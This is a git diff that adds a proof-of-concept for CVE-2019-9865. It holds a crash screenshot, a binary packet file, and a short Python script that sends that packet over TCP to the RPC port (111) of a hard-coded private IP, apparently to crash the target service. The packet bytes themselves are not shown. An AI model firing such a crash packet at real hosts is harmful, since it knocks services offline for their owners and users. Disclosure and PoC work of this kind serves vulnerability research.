diff --git a/CVE-2019-9865/crash.png b/CVE-2019-9865/crash.png new file mode 100755 index 0000000..c77e86a Binary files /dev/null and b/CVE-2019-9865/crash.png differ diff --git a/CVE-2019-9865/pkt b/CVE-2019-9865/pkt new file mode 100644 index 0000000..c2a3af7 Binary files /dev/null and b/CVE-2019-9865/pkt differ diff --git a/CVE-2019-9865/poc.py b/CVE-2019-9865/poc.py new file mode 100644 index 0000000..83bae0e --- /dev/null +++ b/CVE-2019-9865/poc.py @@ -0,0 +1,13 @@ +import socket + +host = "192.168.10.199" +rpcPort = 111 + +f = open("pkt", 'rb') +data = f.read() +f.close() + +sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +sock.connect((host, rpcPort)) +sock.send(data) +sock.close()